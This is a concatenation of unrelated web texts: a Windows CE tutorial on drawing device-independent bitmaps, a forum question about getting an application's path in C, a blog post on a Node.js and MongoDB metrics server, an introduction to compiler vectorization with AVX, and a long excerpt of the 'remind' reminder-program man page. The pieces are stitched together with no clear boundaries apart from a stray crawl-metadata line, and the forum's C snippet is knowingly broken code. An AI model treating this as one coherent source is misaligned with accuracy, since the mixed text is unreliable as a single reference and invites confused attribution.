Device-independent bitmaps take their name from the fact that they include color information along with image data. The advantage of this is that they can be dynamically adjusted to paint properly on any display device, with the disadvantage that the color information takes up space and significantly complicates the process of reading a file and rendering the bitmap. For this reason, if you use DIBs, you use different APIs to access them. On CE devices, unlike on the desktop, we use the function SHLoadDIBitmap() to get a handle to the DIB. After that, the steps required to manipulate and display the image are more or less the same ones you would use with a device-dependent bitmap. The example application PasteDIB shows these steps, but because it's much like the bitmap code you've already seen, we'll just highlight the differences here. (The sources and support files are included in their entirety on the accompanying CD.)
First, for many CE platforms, you'll need a special header file, shellapi.h:
#include <shellapi.h>
Next, we load the bitmap file by name in response to the WM_PAINT message:
case WM_PAINT:
    RECT rt;
    hdc = BeginPaint(hWnd, &ps);
    GetClientRect(hWnd, &rt);
    //use a null-terminated Unicode string for the file name
    hbmpDIB = SHLoadDIBitmap(TEXT("\\Windows\\Clouds.dib"));
    //now, use the returned bitmap handle in the typical ways
    hdcMemory = CreateCompatibleDC( hdc );
    SelectObject( hdcMemory, hbmpDIB );
    GetObject( hbmpDIB, sizeof(BITMAP), &bmp );
    BitBlt(hdc, 0, (GetSystemMetrics(SM_CYSCREEN) / 8),
           bmp.bmWidth, bmp.bmHeight, hdcMemory, 0, 0, SRCCOPY);
    EndPaint(hWnd, &ps);
    break;
Notice two things about this code fragment. First, we use the TEXT() macro to format a literal string for the file name. Under CE, all filenames and user interface text strings are Unicode. SHLoadDIBitmap() will fail if the filename string is not Unicode. Also, notice that we have specified a fully qualified pathname, \Windows\Clouds.dib, for the DIB file. When you copy files to a CE device to try DIBPaste, you'll need to make sure that Clouds.dib ends up there. Finally, notice that once we retrieve a handle to the bitmap data contained in the DIB file, we can treat it in the same way as we'd treat any other bitmap.
Looking Ahead
Perhaps the most noticeable differences in the graphics programming you'll undertake for CE hinge on the fact that users rely heavily or even exclusively on the "touchable screen" metaphor implemented in the stylus. In some cases, programming for stylus "taps" isn't awfully different than programming for mouse clicks. When it comes to the stylus as a text input device, however, things definitely begin to become a bit more complex.
In the next series of examples, we'll explore handling the stylus and the ink control. In the process, we'll look into what you can do to make your Win32 applications stylus capable as quickly and effectively as possible.<< | https://www.developer.com/ws/pc/article.php/10947_2174651_2/Using-Device-Independent-Bitmaps-in-WinCE-Development.htm | CC-MAIN-2019-09 | refinedweb | 492 | 52.8 |
Hello,
I am new to this. Hope I won't break any etiquette unknowingly. I DID my homework, I believe ...
I'd like to get C/C++ code which allows me to get the path of the active application, ideally in the format of char. I wrote a program for which I want to retrieve info from a txt file (specific parameters) and also to save data in a txt file. Since I would like to use this program on a variety of Macs, I'd like it to be able to automatically retrieve the path so no matter what it'll find the parameter.txt file and the savedata.txt file.
I am using Macintosh computers with OS X (10.4.8), Metrowerk's CodeWarrior C/C++, and Carbon platform (until I learn cocoa).
Here's sample code I had hoped would do the job but it doesn't because I don't know what an "environment variable" is (i.e. how to define one, how to use it). Maybe to use getenv is totally wrong?
#include <stdio.h>
#include <stdlib.h>

int main()
{
    char *value;
    char *var;
    if ((value = getenv(var)) == NULL) {
        printf("%s is not an environmental variable", var);
    } else {
        printf("%s = %s \n", var, value);
    }
    // I hoped that var would contain the path.
    return 0;
}
Thanks for your patience and any help you might be able to offer!
BP
In my previous posts, I introduced you to Node.js and walked through a bit of its codebase. Now I want to get a simple, but non-trivial Node.js application running. My biggest problem with Node.js so far has been the lack of substantial examples: if I see one more Hello World or Echo Server, I’ll flip my lid (side note: I found the same thing for Ruby’s EventMachine so I created my evented repo). By far the best resource I’ve found for learning Node.js has been DailyJS, highly recommended!
So I’ve spent the last few weeks building Chrono.js, an application metrics server. Chrono is still under development so it’s really not appropriate for general usage but it makes for a decent example app.
Here’s a basic request which fetches data from MongoDB and renders it via jqtpl:
app.get('/', function(req, res) {
  db.open(function(err, ignored) {
    if (err) console.log(err);
    db.collectionNames(function(err, names) {
      if (err) console.log(err);
      db.close();
      pro = _(names).chain()
        .pluck('name')
        .map(function(x) { return x.substr(x.indexOf('.') + 1); })
        .reject(function(x) { return (x.indexOf('system.') == 0); })
        .value();
      res.render('index.html.jqtpl', { locals: { metrics: pro } });
    });
  });
});
We are scanning MongoDB for the set of metric collections and displaying them in the selector so the user can switch between them. See the main source file for more examples about parameter handling, headers, JSON, etc.
You will need MongoDB installed and running locally. You should already have Node.js and npm installed from Part I. Let’s install the javascript libraries required and Chrono itself:
npm install express expresso jqtpl mongodb underscore tobi
git clone git://github.com/mperham/chrono.js.git
Express is a lightweight application server, similar to Sinatra. jqtpl is jQuery Templates, which allows us to dynamically render HTML. mongodb is the MongoDB client driver for Node.js. expresso is a TDD framework and tobi is an HTTP functional testing package. Finally, underscore is a great little utility library which provides JavaScript with a much more sane functional programming API.
You can run the tests:
expresso
or run the Chrono.js server:
node chrono.js
Click to load in some fake data and visit (select ‘registrations’) to see the results, graphed in living color for you!
Expresso gives us a simple DSL for testing our endpoints but I found it to be lacking basic setup/teardown functionality which I had to roll myself in order to insert some test data. I would have preferred to use vows.js but it appears to be incompatible with tobi. Check out the Chrono.js test suite for what I came up with, here’s a small sample:
exports['POST /metrics'] = function() {
  assert.response(app, {
      url: '/metrics',
      method: 'POST',
      headers: { 'content-type': 'application/json' },
      data: JSON.stringify({
        k: 'registrations',
        v: 4,
        at: parseInt(Number(new Date()) / 1000)
      })
    }, {
      status: 201,
      headers: { 'Content-Type': 'text/html; charset=utf8' },
      body: ''
    });
};
With expresso, we export the set of functions to run from our test module. Expresso runs them all in parallel and collects the results. The parallelism means that you must be careful with any test data you create. Since MongoDB doesn’t support transactions, we can’t use transactions to isolate each of our tests (e.g. see Rails’s transactional fixtures) so you need to be careful about the data created or deleted by each test and how you assert the current state.
While I’ve gotten much better in the last week, I’ll admit I’m still uncomfortable with Node.js. Its asynchronous semantics mean that your code runs as part of a chain of callbacks; knowing when, where and how that chain works is still difficult for me to understand. Frequently you’ll just get a black screen and a process that won’t exit or an error message that may or may not be related to the actual bug.
That said, I still remember being very frustrated with Ruby, its frequent use of “magic” and poor documentation (e.g. navigating this still befuddles me). I overcame those issues to be very comfortable with Ruby in general; I hope more time with Node.js will give me the same relief.
Interested in a Career at Carbon Five? Check out our job openings. | https://blog.carbonfive.com/node-js-part-iii-full-stack-application/ | CC-MAIN-2021-25 | refinedweb | 721 | 58.99 |
Recently I was working closely with analyzing different vectorization cases. So I decided to write a series of articles dedicated to this topic.
This is the first post in the series, so let me start with some introductory info. Vectorization is a form of SIMD, which lets a single CPU instruction crunch multiple values at once.
I know it's a poor introduction when wiki links are just thrown around, so let me show you a simple example (godbolt):
#include <vector>

void foo( std::vector<unsigned>& lhs, std::vector<unsigned>& rhs )
{
    for( unsigned i = 0; i < lhs.size(); i++ )
    {
        lhs[i] = ( rhs[i] + 1 ) >> 1;
    }
}
Let's compile it with clang with the options -O2 -march=core-avx2 -std=c++14 -fno-unroll-loops. I turned off loop unrolling to simplify the assembly, and -march=core-avx2 tells the compiler that the generated code will be executed on a machine with AVX2 support. The generated assembly contains two versions of the loop:
Scalar version:

Vector version:
So here you can see that the vector version crunches 8 integers at a time (256 bits = 8 × 32-bit integers). If you analyze the assembly carefully enough, you will spot the runtime check that dispatches to one of those two versions: if there are not enough elements in the vector to justify the vector version, the scalar version is taken. The instruction count is smaller in the vector version, although every vector instruction has higher latency than its scalar counterpart.
Vector operations can give significant performance gains, but they come with quite a few restrictions, which we will cover later. Historically, Intel has had 3 instruction-set families for vectorization: MMX, SSE and AVX.
Vector registers for those instruction sets are described here.
In general, not only loops can be vectorized. There is also linear vectorizer (in llvm it is called SLP vectorizer) which is searching for similar independent scalar instructions and tries to combine them.
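As an illustration (my own sketch, not taken from any compiler documentation), straight-line code like the following is a typical SLP-vectorization candidate: four independent additions on adjacent elements that the compiler can merge into a single 128-bit vector add.

```cpp
#include <cstdint>

// Four independent scalar additions on adjacent elements -- a pattern the
// SLP (superword-level parallelism) vectorizer can combine into one
// vector instruction, even though no loop is present.
void add4(const uint32_t* a, const uint32_t* b, uint32_t* out) {
    out[0] = a[0] + b[0];
    out[1] = a[1] + b[1];
    out[2] = a[2] + b[2];
    out[3] = a[3] + b[3];
}
```

Whether the transformation actually fires depends on the optimization level and target; comparing the assembly with and without -fno-slp-vectorize is an easy way to check.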
To check the vector capabilities of your CPU, you can type lscpu. For my Intel Core i5-7300U, the filtered flags output includes (among others) pni and pclmulqdq. For us, the most interesting part is that this CPU supports the sse4_2 and avx instruction sets.
That’s all for now. In later articles I’m planning to cover the following topics:
remind man page
remind — a sophisticated reminder service
Synopsis
remind [options] filename [date] [*rep] [time]
Description
Remind reads the supplied filename and executes the commands found in it. The commands are used to issue reminders and alarms. Each reminder or alarm can consist of a message sent to standard output, or a program to be executed.
If filename is specified as a single dash '-', then Remind takes its input from standard input. This also implicitly enables the -o option, described below.
If filename happens to be a directory rather than a plain file, then Remind reads all of the files in that directory that match the pattern "*.rem". The files are read in sorted order; the sort order may depend on your locale, but should match the sort order used by the shell to expand "*.rem".
Remind reads its files from beginning to end, or until it encounters a line whose sole content is "__EOF__" (without the quotes.) Anything after the __EOF__ marker is completely ignored.

The -c option causes Remind to produce a calendar that is sent to standard output. If you supply a number n, then a calendar will be generated for n months, starting with the current month. By default, a calendar for only the current month is produced.
You can precede n (if any) with a set of flags. The flags are as follows:
- '+'. The approximation is (of necessity) very coarse, because the VT100 only has eight different color sequences, each with one of two brightnesses. A color component greater than 64 is considered "on", and if any of the three color components is greater than 128, the color is considered "bright".
- -wcol[,pad[,spc]]]
The -w option specifies the output width, padding and spacing of the formatted calendar output. Col specifies the number of columns in the output device, and defaults to 80. Pad specifies how many lines to use to "pad" empty calendar boxes. This defaults to 5. If you have many reminders on certain days that make your calendar too large to fit on a page, you can try reducing pad to make the empty boxes smaller. Spc specifies how many blank lines to leave between the day number and the first reminder entry. It defaults to 1.
Any of col, pad or spc can be omitted, providing you provide the correct number of commas. Don't use any spaces in the option.
- -a
This option causes Remind not to trigger timed reminders that would otherwise trigger on the current day. It also causes Remind not to place timed reminders in a calendar. If you supply two or more -a options, then Remind will trigger timed reminders that are in the future, but will not trigger timed reminders whose time has passed. (Regardless of how many -a options you supply, Remind will not include timed reminders in the calendar if at least one -a option is used.)
- func(args)=definition
Allows you to define a function on the command line.
If you supply a date on the command line, it must consist of day month year, where day is the day of the month, month is at least the first three letters of the English name of the month, and year is a year (all 4 digits) from 1990 to about 2075. You can leave out the day, which then defaults to 1.
If you do supply a date on the command line, then Remind uses it, rather than the actual system date, as its notion of "today." This lets you create calendars for future months, or test to see how your reminders will be triggered in the future. Similarly, you can supply a time (in 24-hour format -- for example, 17:15) to set Remind's notion of "now" to a particular time. Supplying a time on the command line also implicitly enables the -q option and disables the -z option.
If you would rather specify the date more succinctly, you can supply it as YYYY-MM-DD or YYYY/MM/DD. You can even supply a date and time on the command line as one argument: YYYY-MM-DD@HH:MM.
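For instance, to see how your reminders would trigger at 9:00 on some future date, you could invoke Remind as follows (the path and date here are illustrative):

```
remind ~/.reminders 2011-12-25@09:00
```

This sets Remind's notion of "now" to that date and time, implicitly enabling -q as described above.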
In addition, you can supply a repeat parameter, which has the form *n, where n is the repetition period in days. For example:

REM 1 Jan 1993 *14 \
    OMIT sat sun BEFORE \
    MSG [ord(thisyear-1980)] payment due %b!
A reminder file consists of commands, with one command per line. Several lines can be continued using the backslash character, as in the above example. In this case, all of the concatenated lines are treated as a single line by Remind. Note that if an error occurs, Remind reports the line number of the last line of a continued line.
Remind ignores blank lines, and lines beginning with the '#' or ';' characters. You can use the semicolon as a comment character if you wish to pass a Remind script through the C pre-processor, which interprets the '#' character as the start of a pre-processing directive.
Note that Remind processes line continuations before anything else. For example:

# This comment ends with a backslash \
REM 1 Jan MSG Happy New Year!

Because the continuation is processed first, the REM command above becomes part of the comment and is never executed.
The most powerful command in a Remind script is the REM command. This command is responsible for issuing reminders. Its syntax is:
REM [ONCE] [date_spec] [back] [delta] [repeat] [PRIORITY prio] [SKIP | BEFORE | AFTER] [OMIT omit_list] [OMITFUNC omit_function] [AT time [tdelta] [trepeat]] [SCHED sched_function] [WARN warn_function] [UNTIL expiry_date | THROUGH last_date] [SCANFROM scan_date | FROM start_date] [DURATION duration] [TAG tag] <MSG | MSF | RUN | CAL | SATISFY | SPECIAL special | PS | PSFILE> body
The parts of the REM command can be specified in any order, except that the body must come immediately after the MSG, RUN, CAL, PS, PSFILE or SATISFY keyword.
The REM token is optional, provided that the remainder of the command cannot be mistaken for another Remind command such as OMIT or RUN. The portion of the REM command before the MSG, MSF, RUN, CAL or SATISFY clause is called a trigger.
MSG, MSF, RUN, CAL, SPECIAL, PS and PSFILE
These keywords denote the type of the reminder. (SATISFY is more complicated and will be explained later.) A MSG-type reminder normally prints a message to the standard output, after passing the body through a special substitution filter, described in the section "The Substitution Filter." However, if you have used the -k command-line option, then MSG-type reminders are passed to the appropriate program. Note that the options -c, -s, -p and -n disable the -k option.
Note that you can omit the reminder type, in which case it defaults to MSG. So you can write:
6 January Dianne's Birthday
although this is not recommended.
The MSF keyword is almost the same as the MSG keyword, except that the reminder is formatted to fit into a paragraph-like format. Three system variables control the formatting of MSF-type reminders - they are $FirstIndent, $SubsIndent and $FormWidth. They are discussed in the section "System Variables." The MSF keyword causes the spacing of your reminder to be altered - extra spaces are discarded, and two spaces are placed after periods and other characters, as specified by the system variables $EndSent and $EndSentIg. Note that if the body of the reminder includes newline characters (placed there with the %_ sequence), then the newlines are treated as the beginnings of new paragraphs, and the $FirstIndent indentation is used for the next line. You can use two consecutive newlines to have spaced paragraphs emitted from a single reminder body.
A RUN-type reminder also passes the body through the substitution filter, but then executes the result as a system command. A CAL-type reminder is used only to place entries in the calendar produced when Remind is run with the -c, -s or -p options.
A PS or PSFILE-type reminder is used to pass PostScript code directly to the printer when producing PostScript calendars. This can be used to shade certain calendar entries (see the psshade() function), include graphics in the calendar, or almost any other purpose you can think of. You should not use these types of reminders unless you are an expert PostScript programmer. The PS and PSFILE reminders are ignored unless Remind is run with the -p option. See the section "More about PostScript" for more details.
A SPECIAL-type reminder is used to pass "out-of-band" information from Remind to a calendar-producing back-end. It should be followed by a word indicating the type of special data being passed. The type of a special reminder depends on the back-end. For the Rem2PS back-end, SPECIAL PostScript is equivalent to a PS-type reminder, and SPECIAL PSFile is equivalent to a PSFILE-type reminder. The body of a SPECIAL reminder is obviously dependent upon the back-end.
DATE SPECIFICATIONS
A date_spec consists of zero to four parts. These parts are day (day of month), month (month name), year and weekday. Month and weekday are the English names of months and weekdays. At least the first three characters must be used. The following are examples of the various parts of a date_spec:
- day:
1, 22, 31, 14, 3
- month:
JANUARY, feb, March, ApR, may, Aug
- year:
1990, 1993, 2030, 95 (interpreted as 1995). The year can range from 1990 to 2075.
- weekday:
Monday, tue, Wed, THU, Friday, saturday, sundAy
Note that there can be several weekday components separated by spaces in a date_spec.
INTERPRETATION OF DATE SPECIFICATIONS
The following examples show how date specifications are interpreted.
1. Null date specification - the reminder is triggered every day. The trigger date for a specific run is simply the current system date.
2. Only day present. The reminder is triggered on the specified day of each month. The trigger date for a particular run is the closest such day to the current system date. For example:
REM 1 MSG First of every month.
Note that when both weekday and day are specified, Remind chooses the first date on or after the specified day that also satisfies the weekday constraint. It does this by picking the first date on or after the specified day that is listed in the list of weekdays. Thus, a reminder like:
REM Mon Tue 28 Oct 1990 MSG Hi
would be issued only on Monday, 29 October, 1990. It would not be issued on Tuesday, 30 October, 1990, since the 29th is the first date to satisfy the weekday constraints.
SHORT-HAND DATE SPECIFICATIONS
In addition to spelling out the day, month and year separately, you can specify YYYY-MM-DD or YYYY/MM/DD. For example, the following statements are equivalent:

REM 6 Jan 2011 MSG Example
REM 2011-01-06 MSG Example

Note, however, that in a statement such as:

REM 2011-01-06@12:00 +60 MSG Example

the "+60" is a delta that applies to the date rather than a tdelta that applies to the time. We recommend explicitly using the AT keyword with timed reminders.
THE REMIND ALGORITHM
Remind uses the following algorithm to compute a trigger date: Starting from the current date, it examines each day, one at a time, until it finds a date that satisfies the date specification, or proves to itself that no such date exists. (Actually, Remind merely behaves as if it used this algorithm; it would be much too slow in practice. Internally, Remind uses much faster techniques to calculate a trigger date.) See DETAILS ABOUT TRIGGER COMPUTATION for more information.
BACKWARD SCANNING
Sometimes, it is necessary to specify a date as being a set amount of time before another date. For example, the last Monday in a given month is computed as the first Monday in the next month, minus 7 days. The back specification in the reminder is used in this case:
REM Mon 1 -7 MSG Last Monday of every month.
A back is specified with one or two dashes followed by an integer. This causes Remind to move "backwards" from what would normally be the trigger date. The difference between --7 and -7 will be explained when the OMIT keyword is described.
ADVANCE WARNING
For some reminders, it is appropriate to receive advance warning of the event. For example, you may wish to be reminded of someone's birthday several days in advance. The delta portion of the REM command achieves this. It is specified as one or two "+" signs followed by a number n. Again, the difference between the "+" and "++" forms will be explained under the OMIT keyword. Remind will trigger the reminder on computed trigger date, as well as on each of the n days before the event. Here are some examples:
REM 6 Jan +5 MSG Remind me of birthday 5 days in advance.
The above example would be triggered every 6th of January, as well as the 1st through 5th of January.
PERIODIC REMINDERS
We have already seen some built-in mechanisms for certain types of periodic reminders. For example, an event occurring every Wednesday could be specified as:
REM Wed MSG Event!
However, events that do not repeat daily, weekly, monthly or yearly require another approach. The repeat component of the REM command fills this need. To use it, you must completely specify a date (year, month and day, and optionally weekday.) The repeat component is an asterisk followed by a number specifying the repetition period in days.
For example, suppose you get paid every second Wednesday, and your last payday was Wednesday, 28 October, 1992. You can use:
REM 28 Oct 1992 *14 MSG Payday
This issues the reminder every 14 days, starting from the calculated trigger date. You can use delta and back with repeat. Note, however, that the back is used only to compute the initial trigger date; thereafter, the reminder repeats with the specified period. Similarly, if you specify a weekday, it is used only to calculate the initial date, and does not affect the repetition period.
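Combining these pieces, a sketch of a repeating reminder with advance warning (the warning period is chosen for illustration):

```
# Paid every 14 days starting Wed 28 Oct 1992, with 2 days' warning:
REM 28 Oct 1992 *14 +2 MSG Payday %b!
```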
SCANFROM and FROM
The SCANFROM and FROM keywords are for advanced Remind programmers only, and will be explained in the section "Details about Trigger Computation" near the end of this manual. Note that SCANFROM is available only in versions of Remind from 03.00.04 up. FROM is available only from 03.01.00 and later.
PRIORITY
The PRIORITY keyword must be followed by a number from 0 to 9999. It is used in calendar mode and when sorting reminders. If two reminders have the same trigger date and time, then they are sorted by priority. If the PRIORITY keyword is not supplied, a default priority of 5000 is used. (This default can be changed by adjusting the system variable $DefaultPrio. See the section "System Variables" for more information.)
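For example (illustrative reminders, not from the original):

```
# Sorted first on 1 January, ahead of the default priority of 5000:
REM 1 Jan PRIORITY 1000 MSG Happy New Year!
REM 1 Jan MSG Check insurance policies
```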
EXPIRY DATES
Some reminders should be issued periodically for a certain time, but then expire. For example, suppose you have a class every Friday, and that your last class is on 11 December 1992. You can use:

REM Fri UNTIL 11 Dec 1992 MSG Class today.

THE ONCE KEYWORD

Some reminders should be issued at most once on a given day, no matter how many times Remind is run. For example:

REM ONCE RUN do_backup

(Here, do_backup is assumed to be a program or shell script that does the work.) If you run Remind from your .login script, for example, and log in several times per day, the do_backup program will be run each time you log in. If, however, you use the ONCE keyword in the reminder, then Remind checks the last access date of the reminder script. If it is the same as the current date, Remind assumes that it has already been run, and will not issue reminders containing the ONCE keyword.
Note that if you view or edit your reminder script, the last access date will be updated, and the ONCE keyword will not operate properly. If you start Remind with the -o option, then the ONCE keyword will be ignored.
LOCALLY OMITTING WEEKDAYS
The OMIT portion of the REM command is used to "omit" certain days when counting the delta or back. It is specified using the keyword OMIT followed by a list of weekdays. Its action is best illustrated with examples:
REM 1 +1 OMIT Sat Sun MSG Important Event
This reminder is normally triggered on the first of every month, as well as the day preceding it. However, if the first of the month falls on a Sunday or Monday, then the reminder is triggered starting from the previous Friday. This is because the delta of +1 does not count Saturday or Sunday when it counts backwards from the trigger date to determine how much advance warning to give.
Contrast this with the use of "++1" in the above command. In this case, the reminder is triggered on the first of each month, as well as the day preceding it. The omitted days are counted.
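A sketch contrasting the two forms, assuming the 1st of the month falls on a Sunday:

```
# "+1" skips the OMITted weekend: warnings start on Friday.
REM 1 +1 OMIT Sat Sun MSG Important Event
# "++1" counts the omitted days: warnings start on Saturday.
REM 1 ++1 OMIT Sat Sun MSG Important Event
```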
REM 1 -1 OMIT Sat Sun MSG Last working day of month
Again, in the above example, the back of -1 normally causes the trigger date to be the last day of the month. However, because of the OMIT clause, if the first of the month falls on a Sunday or Monday, the trigger date is moved backwards past the weekend to Friday. (If you have globally omitted holidays, the reminder will be moved back past them, also. See "The OMIT command" for more details.)
By comparison, if we had used "--1", the reminder would be triggered on the last day of the month, regardless of the OMIT.
COMPUTED LOCAL OMITS
The OMITFUNC phrase of the REM command allows you to supply a function that determines whether or not a date is omitted. The function is passed a single parameter of type DATE, and must return a non-zero integer if the date is considered "omitted" and 0 otherwise. Here's an example:
FSET _third(x) (day(x) % 3) || \
               (wkdaynum(x) == 0) || \
               (wkdaynum(x) == 6)
REM OMITFUNC _third AFTER MSG Working day divisible by 3
In the example above, the reminder is triggered every Monday to Friday whose day-of-month number is divisible by three. Here's how it works:
- The function _third returns non-zero (meaning "omitted") for any date whose day-of-month number is not divisible by three, or that falls on a Saturday (wkdaynum 6) or Sunday (wkdaynum 0).
- The AFTER keyword causes the reminder to be moved after a block of omitted days.
The combination of OMITFUNC and AFTER keyword causes the reminder to be issued on all days whose day-of-month number is divisible by three, but not on Saturday or Sunday.
Note that if you use OMITFUNC, then a local OMIT is ignored as are all global OMITs. If you want to omit specific weekdays, your omit function will need to test for them specifically. If you want to take into account the global OMIT context, then your omit function will need to test for that explicitly (using the isomitted() function.)
Note that an incorrect OMITFUNC might cause all days to be considered omitted. For that reason, when Remind searches through omitted days, it terminates the search after the SATISFY iteration limit (command-line option -x.)
TIMED REMINDERS
Timed reminders are those that have an AT keyword followed by a time and optional tdelta and trepeat. The time must be specified in 24-hour format, with 0:00 representing midnight, 12:00 representing noon, and 23:59 representing one minute to midnight. You can use either a colon or a period to separate the hours from the minutes. That is, 13:39 and 13.39 are equivalent.
Remind treats timed reminders specially. If the trigger date for a timed reminder is the same as the current system date, the reminder is queued for later activation. When Remind has finished processing the reminder file, it puts itself in the background, and activates timed reminders when the system time reaches the specified time.
If the trigger date is not the same as the system date, the reminder is not queued.
For example, the following reminder, triggered every working day, will emit a message telling you to leave at 5:00pm:
REM Mon Tue Wed Thu Fri AT 17:00 MSG Time to leave!
The following reminder will be triggered on Thursdays and Fridays, but will only be queued on Fridays:
REM Fri ++1 AT 13:00 MSG Lunch at 1pm Friday.
The tdelta and trepeat have the same form as a repeat and delta, but are specified in minutes. For example, this reminder will be triggered at 12:00pm as well as 45 minutes before:
REM AT 12:00 +45 MSG Example
The following will be issued starting at 10:45, every half hour until 11:45, and again at noon.
REM AT 12:00 +75 *30 MSG Example2
The "+75" means that the reminder is issued starting 75 minutes before noon; in other words, at 10:45. The *30 specifies that the reminder is subsequently to be issued every 30 minutes. Note that the reminder is always issued at the specified time, even if the tdelta is not a multiple of the trepeat. So the above example is issued at 10:45am, 11:15am, 11:45am, and 12:00pm. Note that in the time specification, there is no distinction between the "+" and "++" forms of tdelta.
Normally, Remind will issue timed reminders as it processes the reminder script, as well as queuing them for later. If you do not want Remind to issue the reminders when processing the script, but only to queue them for later, use the -a command-line option. If you start Remind from your X start-up script, you can use a line such as:

remind -z -k'xmessage %s &' myreminders &

This ensures that when you exit X-Windows, the Remind process is killed.
WARNING ABOUT TIMED REMINDERS
Note: If you use user-defined functions or variables (described later) in the bodies of timed reminders, then when the timed reminders are activated, the variables and functions have the definitions that were in effect at the end of the reminder script. These definitions may not necessarily be those that were in effect at the time the reminder was queued.
THE SCHED AND WARN KEYWORDS
The SCHED keyword allows more precise control over the triggering of timed reminders, and the WARN keyword allows precise control over the advance triggering of all types of reminders. However, discussion must be deferred until after expressions and user-defined functions are explained. See the subsection "Precise Scheduling" further on.
TAG AND DURATION
The TAG keyword lets you "tag" certain reminders. This facility is used by certain back-ends or systems built around Remind, such as TkRemind. These back-ends have specific rules about tags; see their documentation for details.
The TAG keyword is followed by a tag consisting of up to 48 characters. You can have as many TAG clauses as you like in a given REM statement.
If you supply the -y option to Remind, then any reminder that lacks a TAG will have one synthesized. The synthesized tag consists of the characters "__syn__" followed by the hexadecimal representation of the MD5 sum of the REM command line. This lets you give a more-or-less unique identifier to each distinct REM command.
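For example (the tag name here is assumed):

```
# Back-ends such as TkRemind can use the tag to identify this reminder:
REM 1 Jan TAG newyear MSG Happy New Year!
```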
The DURATION keyword makes sense only for timed reminders; it specifies the duration of an event.
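A minimal sketch (the H:MM duration format is assumed here):

```
# A meeting at 2:00pm lasting an hour and a half:
REM Mon AT 14:00 DURATION 1:30 MSG Staff meeting
```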
THE SUBSTITUTION FILTER

Before a reminder body is output or executed, it is passed through a substitution filter that expands special %-sequences.

- %a
is replaced with a phrase like "on weekday, day month, year", or with "today" or "tomorrow", as appropriate.

For example, consider the reminder:
REM 18 Oct 1990 +4 MSG Meeting with Bob %a.
On 16 October 1990, it would print "Meeting with Bob on Thursday, 18 October, 1990."
On 17 October 1990, it would print "Meeting with Bob tomorrow."
On 18 October 1990, it would print "Meeting with Bob today."
- %b
is replaced with "in diff days' time" where diff is the actual number of days between the current date and the trigger date. (OMITs have no effect.)
For example, consider:
REM 18 Oct 1990 +4 MSG Meeting with Bob %b.
On 16 October 1990, it would print "Meeting with Bob in 2 days' time."
On 17 October 1990, it would print "Meeting with Bob tomorrow."
On 18 October 1990, it would print "Meeting with Bob today."
- Remind normally prints a blank line after each reminder; if the last character of the body is "%", the blank line will not be printed.
- Capital letters can be used in the substitution sequence, in which case the first character of the substituted string is capitalized (if it is normally a lower-case letter.)
The OMIT Command
In addition to being a keyword in the REM command, OMIT is a command in its own right. Its syntax is:
OMIT day month [year]
or:
OMIT day1 month1 year1 THROUGH day2 month2 year2
The OMIT command is used to "globally" omit certain days (usually holidays). These globally-omitted days are skipped by the "-" and "+" forms of back and delta. Some examples:
OMIT 1 Jan OMIT 7 Sep 1992
The first example specifies a holiday that occurs on the same date each year - New Year's Day. The second example specifies a holiday that changes each year - Labour Day. For these types of holidays, you must create an OMIT command for each year. (Later, in the description of expressions and some of the more advanced features of Remind, you will see how to automate this for some cases.)
As with the REM command, you can use shorthand specifiers for dates; the following are equivalent:

OMIT 7 Sep 1992
OMIT 1992-09-07

The BEFORE and AFTER keywords move the trigger date of a reminder to before or after a block of omitted days, respectively. Suppose you normally run a backup on the first day of the month. However, if the first day of the month is a weekend or holiday, you run the backup on the first working day following the weekend or holiday. You could use:
REM 1 OMIT Sat Sun AFTER RUN do_backup
Let's examine how the trigger date is computed. The 1 specifies the first day of the month. The local OMIT keyword causes the AFTER keyword to move the reminder forward past weekends. Finally, the AFTER keyword will keep moving the reminder forward until it has passed any holidays specified with global OMIT commands.
The Include Command
Remind allows you to include other files in your reminder script, similar to the C preprocessor #include directive. For example, your system administrator may maintain a file of holidays or system-wide reminders. You can include these in your reminder script as follows:
INCLUDE /usr/share/remind/holidays INCLUDE /usr/share/remind/reminders
(The actual pathnames vary from system to system - ask your system administrator.)
INCLUDE files can be nested up to a depth of 8.
If you specify a filename of "-" in the INCLUDE command, Remind will begin reading from standard input.
If you specify a directory as the argument to INCLUDE, then Remind will process all files in that directory that match the shell pattern "*.rem". The files are processed in sorted order; the sort order matches that used by the shell when it expands "*.rem".
The Run Command
If you include other files in your reminder script, you may not always entirely trust the contents of the other files. For example, they may contain RUN-type reminders that could be used to access your files or perform undesired actions. The RUN command can restrict this: If you include the command RUN OFF in your top-level reminder script, any reminder or expression that would normally execute a system command is disabled. RUN ON will re-enable the execution of system commands. Note that the RUN ON command can only be used in your top-level reminder script; it will not work in any files accessed by the INCLUDE command. This is to protect you from someone placing a RUN ON command in an included file. However, the RUN OFF command can be used at top level or in an included file.
If you run Remind with the -r command-line option, RUN-type reminders and the shell() function will be disabled, regardless of any RUN commands in the reminder script. However, any command supplied with the -k option will still be executed.
One use of the RUN command is to provide a secure interface between Remind and the Elm mail system. The Elm system can automatically scan incoming mail for reminder or calendar entries, and place them in your calendar file. To use this feature, you should set the calendar filename option under Elm to be something like "~/.reminders.in", not your main reminder file! This is so that any RUN ON commands mailed to you can never be activated.
Then, you can use the Elm scan message for calendar entries command to place reminders prefaced by "->" into .reminders.in. In your main .reminders file, include the following lines:
RUN OFF # Disable RUN INCLUDE .reminders.in RUN ON # Re-enable RUN
In addition, Remind contains a few other security features. It will not read a file that is group- or world-writable. It will not run set-uid. If it reads a file you don't own, it will disable RUN and the shell() function. And if it is run as root, it will only read files owned by root.
The Banner Command
When Remind first issues a reminder, it prints a message like this:
Reminders for Friday, 30th October, 1992 (today):
(The banner is not printed if any of the calendar-producing options is used, or if the -k option is used.)
The BANNER command lets you change the format. It should appear before any REM commands. The format is:
BANNER format
The format is similar to the body of a REM command. It is passed through the substitution filter, with an implicit trigger of the current system date. Thus, the default banner is equivalent to:
BANNER Reminders for %w, %d%s %m, %y%o:
You can disable the banner completely with BANNER %. Or you can create a custom banner:
BANNER Hi - here are your reminders for %y-%t-%r:
Controlling the Omit Context
Sometimes, it is necessary to temporarily change the global OMITs that are in force for a few reminders. Three commands allow you to do this:
- PUSH-OMIT-CONTEXT
This command saves the current global OMITs on an internal stack.
- CLEAR-OMIT-CONTEXT
This command clears all of the global OMITs, starting you off with a "clean slate."
- POP-OMIT-CONTEXT
This command restores the global OMITs that were saved by the most recent PUSH-OMIT-CONTEXT.
For example, suppose you have a block of reminders that require a clear OMIT context, and that they also introduce unwanted global OMITs that could interfere with later reminders. You could use the following fragment:
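A minimal sketch of such a fragment (the reminders themselves are assumed for illustration):

```
PUSH-OMIT-CONTEXT
CLEAR-OMIT-CONTEXT
OMIT 24 Dec 2012
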